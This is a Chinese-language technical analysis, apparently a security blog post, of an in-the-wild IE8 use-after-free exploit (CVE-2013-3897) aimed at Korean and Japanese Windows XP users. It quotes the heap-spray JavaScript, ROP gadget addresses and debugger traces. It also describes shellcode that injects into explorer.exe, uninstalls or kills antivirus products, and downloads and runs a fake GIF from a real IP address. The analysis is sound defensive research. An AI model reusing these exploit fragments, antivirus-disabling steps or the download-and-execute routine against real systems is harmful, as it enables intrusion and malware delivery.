之前,看到FireEye上的CVE-2013-3893分析,看利用方式比较类似,以为是同一个,分析学习下,发现导致问题的对象不一致,也没有利用ms-help加载office的hxdl构造ROP,后来在BinVul论坛上看到有人发了该样本,才知道是CVE-2013-3897。不正确地方还请扶正。
1. 概述
该样本攻击对象为韩国和日本的WinXP IE8用户,利用了IE8的CDisplayPointer对象的一个Use-After-Free漏洞,利用DEPS HeapSpray技术进行堆喷射,通过msvcrt.dll构造ROP链绕过DEP进行利用。成功利用后,会注入Shellcode到explorer进程,尝试检查结束Kaspersky、AhnLab V3Lite、AhnLab V3 365 Clinic、NaverVaccine、ALYac安全软件,之后从网络服务器上下载执行伪造成GIF的恶意程序。
2. 样本分析
1) 通过DIV元素设置和清除title属性字符串,大量的申请释放大小为0×48的堆空间,激活LFH机制,防止cache分配空间,用0×14141414填充,作为后续vtable jmp
var vault=new Array();
var str=unescape("% u1414% u1414");
while (str.length < 0x50) str=str+str;
str=str.substr(0,(0x48-2)/2);
for (i=0;i<2000;i++) {
vault.push(document.createElement("div"));
vault[i].setAttribute("title",str);
}
for (i=1000;i<2000;i++) vault[i].setAttribute("title",""); CollectGarbage();
2) 检查用户电脑环境是否满足: Windows XP + IE8 + 韩国/日本
if(navigator.appName.indexOf("Microsoft Internet Explorer") == -1) {att = 0;}
if(navigator.userAgent.indexOf("Windows NT 5.1") == -1) {att = 0;}
if(navigator.userAgent.indexOf("MSIE 8.0") == -1) {att = 0;}
if(navigator.systemLanguage == navigator.userLanguage) {
if(navigator.systemLanguage.indexOf("ko") != -1) {lang = 1;}
else if(navigator.systemLanguage.indexOf("ja") != -1) {lang = 1;}
3) 如果为韩国日本用户,替换为msvcrt.dll对应的ROP链,然后进行HeapSpray
var ate1 = 0x77BD18D3 ;var atz1 = 0x77BCEF5B ; var co1 = 0x77BCF519 ;
var pco1 = 0x77BD3E25 ; var jtc1 = 0x77BE746A ; var vPP1 = 0x77BC1120 ;
if(lang == 1) { ate = ate1; atz = atz1; co = co1; pco = pco1; jtc = jtc1; vPP = vPP1;
3. 漏洞分析
1) 样本本身带了比较多的调试信息, 利用样本已有调试信息,先观察下exp执行的过程
bu jscript!JsAtan2 "j (poi(poi(esp+14)+18) == 0x999) '.printf "DEBUG: %mu", poi(poi(poi(esp+14)+8)+8); .echo; g';" 0:008> g DEBUG: before unselect DEBUG: after unselect DEBUG: before select DEBUG: before swap DEBUG: after swap DEBUG: before unselect DEBUG: after unselect (418.76c): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=14141414 ebx=04c25dbc ecx=030dc200 edx=000000c8 esi=030dc248 edi=80004002 eip=77bd18d5 esp=030dc1e4 ebp=030dc218 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 VERSION!VerpQueryValue+0x54: 77bd18d5 018d45e0508d add dword ptr [ebp-72AF1FBBh],ecx ss:0023:905ea25d=????????
2) 由于不是韩国或日本的windows xp系统,跳转到77bd18d5(本应该msvcrt.dll的)指向的ROP链不正确,触发了异常, 修改跳转地址,重新调试
(8d0.ca0): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=41414141 ebx=0494f48c ecx=030dc200 edx=000000c8 esi=030dc248 edi=80004002 eip=6362746c esp=030dc1e8 ebp=030dc218 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 mshtml!QIClassID+0x45: 6362746c ff10 call dword ptr [eax] ds:0023:41414141=???????? 0:008> kb ChildEBP RetAddr Args to Child 030dc218 638cbbf7 0494f48c 3050f4a5 11cf98b5 mshtml!QIClassID+0x45 030dc290 638cab07 00195380 0494f48c 00000000 mshtml!CDoc::ScrollPointerIntoView+0xc5 030dc2a4 639d115f 0494f470 0020deb8 00000000 mshtml!CDisplayPointer::ScrollIntoView+0x21 030dc2c4 639d10bd 030dc354 030dc390 00000002 mshtml!CHTMLEditor::SelectRangeInternal+0x98 030dc2dc 639d7416 0020deb8 030dc354 030dc390 mshtml!CHTMLEditor::SelectRange+0x1a
3) 此时对象空间已经被DIV的title属性值的str字符串所填充
0:008> dds ebx 0494f48c 41414141 0494f490 41414141 0494f494 41414141 0494f498 41414141 0494f49c 41414141 0:008> !heap -p -a ebx address 0494f48c found in _HEAP @ 140000 HEAP_ENTRY Size Prev Flags UserPtr UserSize - state 0494f468 000c 0000 [07] 0494f470 00048 - (busy) Trace: 23a0 7c98cf9a ntdll!RtlDebugAllocateHeap+0x000000e1 7c969564 ntdll!RtlAllocateHeapSlowly+0x00000044 7c938f01 ntdll!RtlAllocateHeap+0x00000e64 6365173e mshtml!_HeapAllocString+0x00000051 <------ !!! 63651871 mshtml!CAttrValue::InitVariant+0x00000154
看下问题代码的上下文, 在进行CLSID为_IID_IProxyManager的接口查询时,使用被释放的对象指针触发异常
.text:63627454 and dword ptr [esi], 0 .text:63627457 mov eax, [ebx] .text:63627459 and [ebp+pInterface], 0 .text:6362745D lea ecx, [ebp+pInterface] .text:63627460 push ecx .text:63627461 push offset _IID_IProxyManager .text:63627466 push ebx .text:63627467 mov edi, 80004002h .text:6362746C call dword ptr [eax] ; ... .text:638CBBC8 mov [esp+58h+var_38], eax .text:638CBBCC mov eax, [esp+58h+var_18] .text:638CBBD0 lea eax, [eax+ecx+2] .text:638CBBD4 mov [esp+58h+var_30], eax .text:638CBBD8 lea eax, [esp+58h+local_pI_CMarkupPointer] .text:638CBBDC push eax ; void ** .text:638CBBDD mov [esp+5Ch+var_34], esi .text:638CBBE1 sub esp, 10h .text:638CBBE4 mov edi, esp .text:638CBBE6 push [ebp+arg_ICMarkupPointer] ; struct IUnknown * <---- !!! .text:638CBBE9 mov esi, offset _CLSID_CMarkupPointer .text:638CBBEE movsd .text:638CBBEF movsd .text:638CBBF0 movsd .text:638CBBF1 movsd .text:638CBBF2 call ?QIClassID@@YGJPAUIUnknown@@U_GUID@@PAPAX@Z ; QIClassID(IUnknown *,_GUID,void * *) .text:638CBBF7 test eax, eax ... .text:638CBB50 push eax ; Dst .text:638CBB51 call _memset .text:638CBB56 add esp, 0Ch .text:638CBB59 lea eax, [esp+58h+Dst] .text:638CBB5D push eax ; int .text:638CBB5E push [ebp+arg_ZERO] ; int .text:638CBB61 push [ebp+arg_ICMarkupPointer] ; struct IUnknown * <--- !!! .text:638CBB64 call ?GetLineInfo@CDoc@@QAEJPAUIMarkupPointer@@HPAU_HTMLPtrDispInfoRec@@@Z ; CDoc::GetLineInfo(IMarkupPointer *,int,_HTMLPtrDispInfoRec *) .text:638CBB69 lea eax, [ebx+1F0h] .text:638CBB6F lea edi, [esp+58h+var_44] ...
在 call CDoc::GetLineInfo以及Call QIClassID处下断点
0:008> bl ... 2 d 638cbb64 0001 (0001) 0:**** mshtml!CDoc::ScrollPointerIntoView+0x32 3 d 638cbbf2 0001 (0001) 0:**** mshtml!CDoc::ScrollPointerIntoView+0xc0
4) 在DEBUG信息swap时激活
0:008> be 2,3 0:008> g DEBUG: after swap eax=030db578 ebx=030db528 ecx=003bb480 edx=633b5f09 esi=049f5518 edi=030db518 eip=633b5f09 esp=030db4d8 ebp=030db53c iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 jscript!JsAtan2: 633b5f09 8bff mov edi,edi 0:008> g Breakpoint 2 hit eax=030dc264 ebx=001938f0 ecx=00000000 edx=00000000 esi=04b4edd0 edi=04b4ede0 eip=638cbb64 esp=030dc22c ebp=030dc290 iopl=0 nv up ei pl nz ac po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212 mshtml!CDoc::ScrollPointerIntoView+0x32: 638cbb64 e8b9faffff call mshtml!CDoc::GetLineInfo (638cb622)
导致问题产生的可能是CDisplayPointer对象,利用代码也表明触发问题的对象在winxp IE8下大小为0×48,与CDisplayPointer一致
此时还没有被释放
0:008> !heap -p -a poi(esp) address 04b2445c found in _HEAP @ 140000 HEAP_ENTRY Size Prev Flags UserPtr UserSize - state 04b24438 000c 0000 [07] 04b24440 00048 - (busy) mshtml!CDisplayPointer::`vftable' <---------- Trace: 359e 7c98cf9a ntdll!RtlDebugAllocateHeap+0x000000e1 7c969564 ntdll!RtlAllocateHeapSlowly+0x00000044 7c938f01 ntdll!RtlAllocateHeap+0x00000e64 635f047a mshtml!CDoc::CreateDisplayPointer+0x00000024 <----------- 63a07165 mshtml!CSelectTracker::InitPointers+0x00000019 635cb78e mshtml!CSelectionManager::SetCurrentTracker+0x00000026 639dc0bf mshtml!CSelectionManager::Select+0x00000761 639d113a mshtml!CHTMLEditor::SelectRangeInternal+0x00000073 639d10bd mshtml!CHTMLEditor::SelectRange+0x0000001a 639d7416 mshtml!CHTMLEditorProxy::SelectRange+0x00000025 6389c886 mshtml!CDoc::Select+0x0000002f
4. Shellcode分析
1) 换成日本window xp, 通过在msvcrt上构造ROP,调用VirtualProtect来过DEP
0:008> u 0x77BD18D3 msvcrt!type_info::operator==+0x3b: 77bd18d3 94 xchg eax,esp 77bd18d4 c15e8bc1 rcr dword ptr [esi-75h],0C1h 77bd18d8 5d pop ebp 77bd18d9 c20400 ret 4 ... 0:008> u 0x77BE746A msvcrt!_SEH_epilog+0xf: 77be746a 51 push ecx ; ecx = ptr kernel32!VirtualProtect 77be746b c3 ret ; call kernel32!VirTualProtect
然后跳转到1414148c开始执行shellcode,经过一些nop指令后,进行XOR 0×94自解密
141414a9 4a dec edx 141414aa 33c9 xor ecx,ecx 141414ac 6681c1f30c add cx,0CF3h 141414b1 80340a94 xor byte ptr [edx+ecx],94h 141414b5 e2fa loop 141414b1
2) 之后会注入shellcode代码到explore进程
hwnd = User32!FindWindowA(classname: "Progman", windowname:"Program Manager"); <-- explorer.exe GetWindowThreadProcessId(hwnd, &pid_explorer); hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid_explorer); hMem = VirtualAllocEx(hProc, NULL, 4096, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE); WriteProcessMemory(hProc, hMem, 14141796, 00000A10, 00000000); CreateRemoteThread(hProc, NULL, 0, 6390000, NULL, 0); kernel32!ExitProcess
3) 注入到explore后,首先通过检查是否存在”c:¥Program Files¥Kaspersky Lab”目录(日本操作系统路径显示为¥),来
判断是否安装卡巴斯基,如果不存在继续执行。
4) sleep 10分钟后,杀软检测函数根据参数1-4执行不同杀软的判断结束操作
参数1时,检测是否安装安博士v3杀毒软件,如果安装调用其自身的卸载程序,然后通过获取卸载确定按钮,通过模拟鼠标
点击来进行卸载。
RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SOFTWARE¥¥AhnLab¥¥V3Lite", 0, KEY_READ, pRes) RegQueryValueExA(hKeym "InstallPath", 0, REG_SZ, pData, 255); ShellExecuteA(NULL, "open", "installpath¥Uninst.exe", "Uninstall", 0, 0) hwnd = FindWindowA(NULL, "V3 Lite f") SetWindowPos(hWnd, HWND_BOTTOM, 0, 0, 100, 200, SWP_HIDEWINDOW) FindWindowExA(hParent, hChildAfter, "Button", "f") PostMessageA(hWnd, WM_LBUTTONDOWN, 0, 0) PostMessageA(hWnd, WM_LBUTTONUP, 0, 0)
参数2时,检测是否安装AhnLab V3 365 Clinic。参数4时,检测是否安装ESTsoft ALYac。如果安装卸载方式同上
参数3时,检测是否安装NaverVaccine安全软件,如果存在,通过ntsd尝试强制结束对应的进程
WinExec("ntsd -c q -pn NVCAgent.npc", SW_HIDE);
WinExec("ntsd -c q -pn Nsavsvc.npc", SW_HIDE)
5) 之后,调用URLDownloadToFileA从http://1.234.31.154/mii/fird.gif下载文件保存到临时目录为main001.gif,如果main001.gif
满足大于1KB小于500KB,则会调用WinExec隐藏执行。
6) 恶意程序分析时URL已经失效,没有分析,该处有对该恶意文件的分析
评论 (0)